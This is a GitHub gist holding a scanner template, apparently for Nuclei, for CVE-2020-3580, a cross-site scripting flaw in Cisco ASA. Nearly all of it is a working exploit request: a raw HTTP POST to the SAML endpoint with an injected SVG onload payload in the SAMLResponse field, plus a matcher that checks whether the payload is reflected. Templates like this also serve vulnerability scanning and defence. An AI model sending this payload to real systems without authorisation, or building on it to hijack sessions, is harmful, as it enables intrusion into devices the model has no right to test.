Skip to content

Instantly share code, notes, and snippets.

@emadshanab
Forked from 0x240x23elu/CVE-2020-3580.yaml
Created December 12, 2023 02:12
Show Gist options
  • Save emadshanab/24cc1c40c0fb2d5aca8ff521a0196d22 to your computer and use it in GitHub Desktop.
Save emadshanab/24cc1c40c0fb2d5aca8ff521a0196d22 to your computer and use it in GitHub Desktop.
CVE-2020-3580
id: CVE-2020-3580
info:
name: xss in cisco ASA
author: 0x240x23elu
severity: high
description: xss in cisco ASA
tags: cve,cve2020,cisco
requests:
- raw:
- |
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
SAMLResponse="><svg/onload=alert('0x240x23elu')>
matchers-condition: and
matchers:
- type: word
words:
- "0x240x23elu"
condition: and
part: body
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment